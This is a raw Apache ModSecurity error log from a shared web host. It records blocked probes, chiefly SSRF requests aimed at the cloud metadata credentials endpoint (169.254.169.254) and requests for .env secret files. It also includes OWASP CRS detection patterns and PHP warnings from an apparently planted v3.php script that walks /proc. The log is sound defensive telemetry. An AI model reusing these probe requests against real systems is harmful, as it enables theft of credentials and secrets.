[Mon May 11 12:58:23.107048 2026] [security2:error] [pid 1254212:tid 1254220] [client 195.178.110.133:56342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2SEYQeUtAPynIs6xuOQAAAAY"]
[Mon May 11 12:58:23.624783 2026] [security2:error] [pid 1256241:tid 1256251] [client 195.178.110.133:56350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2SJkIEwRJMyDaV55jKwAAAUU"]
[Mon May 11 12:58:23.769949 2026] [security2:error] [pid 1254242:tid 1254262] [client 195.178.110.133:31628] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agG2T74KNmD_mZ_vlf9P9wAAAFE"]
[Mon May 11 12:58:24.046838 2026] [security2:error] [pid 1254242:tid 1254262] [client 195.178.110.133:31628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agG2T74KNmD_mZ_vlf9P9wAAAFE"]
[Mon May 11 12:58:24.803500 2026] [security2:error] [pid 1256241:tid 1256257] [client 195.178.110.133:56440] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2SZkIEwRJMyDaV55jLgAAAUs"]
[Mon May 11 12:58:26.803411 2026] [security2:error] [pid 1254212:tid 1254222] [client 195.178.110.133:31662] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agG2UkYQeUtAPynIs6xuTAAAAAg"]
[Mon May 11 12:58:26.803603 2026] [security2:error] [pid 1254212:tid 1254222] [client 195.178.110.133:31662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agG2UkYQeUtAPynIs6xuTAAAAAg"]
[Mon May 11 12:58:27.491049 2026] [security2:error] [pid 1254242:tid 1254262] [client 195.178.110.133:31628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2T74KNmD_mZ_vlf9P9wAAAFE"]
[Mon May 11 12:58:27.674661 2026] [security2:error] [pid 1254212:tid 1254222] [client 195.178.110.133:31662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2UkYQeUtAPynIs6xuTAAAAAg"]
[Mon May 11 12:58:27.683996 2026] [security2:error] [pid 1256241:tid 1256253] [client 195.178.110.133:31692] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agG2U5kIEwRJMyDaV55jPgAAAUc"]
[Mon May 11 12:58:27.684662 2026] [security2:error] [pid 1256241:tid 1256253] [client 195.178.110.133:31692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agG2U5kIEwRJMyDaV55jPgAAAUc"]
[Mon May 11 12:58:28.030238 2026] [security2:error] [pid 1254328:tid 1254337] [client 195.178.110.133:31736] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agG2VERdw2n9wv6Ai48d4wAAAIY"]
[Mon May 11 12:58:28.030460 2026] [security2:error] [pid 1254328:tid 1254337] [client 195.178.110.133:31736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agG2VERdw2n9wv6Ai48d4wAAAIY"]
[Mon May 11 12:58:28.946701 2026] [security2:error] [pid 1256241:tid 1256253] [client 195.178.110.133:31692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2U5kIEwRJMyDaV55jPgAAAUc"]
[Mon May 11 12:58:29.007191 2026] [security2:error] [pid 1254328:tid 1254337] [client 195.178.110.133:31736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2VERdw2n9wv6Ai48d4wAAAIY"]
[Mon May 11 12:58:31.870448 2026] [security2:error] [pid 1254133:tid 1254147] [client 195.178.110.133:31718] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agG2VxjZymfuKpjWXeiSiAAAAMs"]
[Mon May 11 12:58:31.870598 2026] [security2:error] [pid 1254133:tid 1254147] [client 195.178.110.133:31718] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agG2VxjZymfuKpjWXeiSiAAAAMs"]
[Mon May 11 12:58:32.308082 2026] [security2:error] [pid 1254133:tid 1254147] [client 195.178.110.133:31718] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2VxjZymfuKpjWXeiSiAAAAMs"]
[Mon May 11 12:58:32.398693 2026] [security2:error] [pid 1254179:tid 1254191] [client 195.178.110.133:61382] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agG2WGS6k_SCYd1AVZrGLAAAAQo"]
[Mon May 11 12:58:32.398880 2026] [security2:error] [pid 1254179:tid 1254191] [client 195.178.110.133:61382] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agG2WGS6k_SCYd1AVZrGLAAAAQo"]
[Mon May 11 12:58:32.822634 2026] [security2:error] [pid 1254179:tid 1254191] [client 195.178.110.133:61382] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2WGS6k_SCYd1AVZrGLAAAAQo"]
[Mon May 11 12:58:32.930783 2026] [security2:error] [pid 1254328:tid 1254340] [client 195.178.110.133:61388] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agG2WERdw2n9wv6Ai48d7gAAAIk"]
[Mon May 11 12:58:32.930925 2026] [security2:error] [pid 1254328:tid 1254340] [client 195.178.110.133:61388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agG2WERdw2n9wv6Ai48d7gAAAIk"]
[Mon May 11 12:58:33.334378 2026] [security2:error] [pid 1254328:tid 1254340] [client 195.178.110.133:61388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2WERdw2n9wv6Ai48d7gAAAIk"]
[Mon May 11 12:58:33.937612 2026] [security2:error] [pid 1256241:tid 1256248] [client 195.178.110.133:61412] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agG2WZkIEwRJMyDaV55jRwAAAUI"]
[Mon May 11 12:58:33.937741 2026] [security2:error] [pid 1256241:tid 1256248] [client 195.178.110.133:61412] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agG2WZkIEwRJMyDaV55jRwAAAUI"]
[Mon May 11 12:58:34.334736 2026] [security2:error] [pid 1256241:tid 1256248] [client 195.178.110.133:61412] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2WZkIEwRJMyDaV55jRwAAAUI"]
PHP Warning:  filesize(): stat failed for /proc/62/task/62/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/62/task/62/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/62/task/62/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/62/task/62/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/62/task/62/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/62/task/62/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704682/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704682/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704682/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704682/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704682/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704682/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 13:00:54.016387 2026] [security2:error] [pid 1254212:tid 1254223] [client 49.235.136.28:49498] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tct-telecom.fr"] [uri "/"] [unique_id "agG25kYQeUtAPynIs6xutAAAAAk"]
[Mon May 11 13:01:32.465444 2026] [:error] [pid 1254179:tid 1254204] [client 154.83.211.58:52367] File does not exist: /home/ofcrysta/public_html/zz.php
[Mon May 11 13:03:19.589945 2026] [:error] [pid 1256241:tid 1256260] [client 47.128.120.117:22232] File does not exist: /home/domaine1/public_html/erreur.php
PHP Warning:  filesize(): stat failed for /proc/1704715/task/1704715/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704715/task/1704715/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704715/task/1704715/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704715/task/1704715/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704715/task/1704715/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704715/task/1704715/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 13:04:09.739175 2026] [security2:error] [pid 1254212:tid 1254218] [client 43.166.226.186:43000] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "piregwan-genesis.com"] [uri "/"] [unique_id "agG3qUYQeUtAPynIs6xvIwAAAAQ"], referer: http://piregwan-genesis.com
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790189/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790189/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790189/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790189/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790189/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790189/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 13:04:50.975549 2026] [authz_core:error] [pid 1254179:tid 1254195] [client 216.73.216.110:53953] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/cron/error_log
PHP Warning:  filesize(): stat failed for /proc/968/task/969/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/968/task/969/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/968/task/969/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/968/task/969/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/968/task/969/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/968/task/969/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 13:04:59.998173 2026] [authz_core:error] [pid 1254179:tid 1254186] [client 47.128.126.102:37996] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/SimplePie/error_log
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704662/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704662/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704662/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704662/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704662/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704662/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 13:05:15.188506 2026] [security2:error] [pid 1256241:tid 1256253] [client 15.235.145.59:63643] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/postingchannel.com"] [unique_id "agG365kIEwRJMyDaV55kcgAAAUc"]
[Mon May 11 13:05:15.189198 2026] [security2:error] [pid 1256241:tid 1256253] [client 15.235.145.59:63643] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/postingchannel.com"] [unique_id "agG365kIEwRJMyDaV55kcgAAAUc"]
[Mon May 11 13:05:15.189876 2026] [security2:error] [pid 1256241:tid 1256253] [client 15.235.145.59:63643] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/postingchannel.com"] [unique_id "agG365kIEwRJMyDaV55kcgAAAUc"]
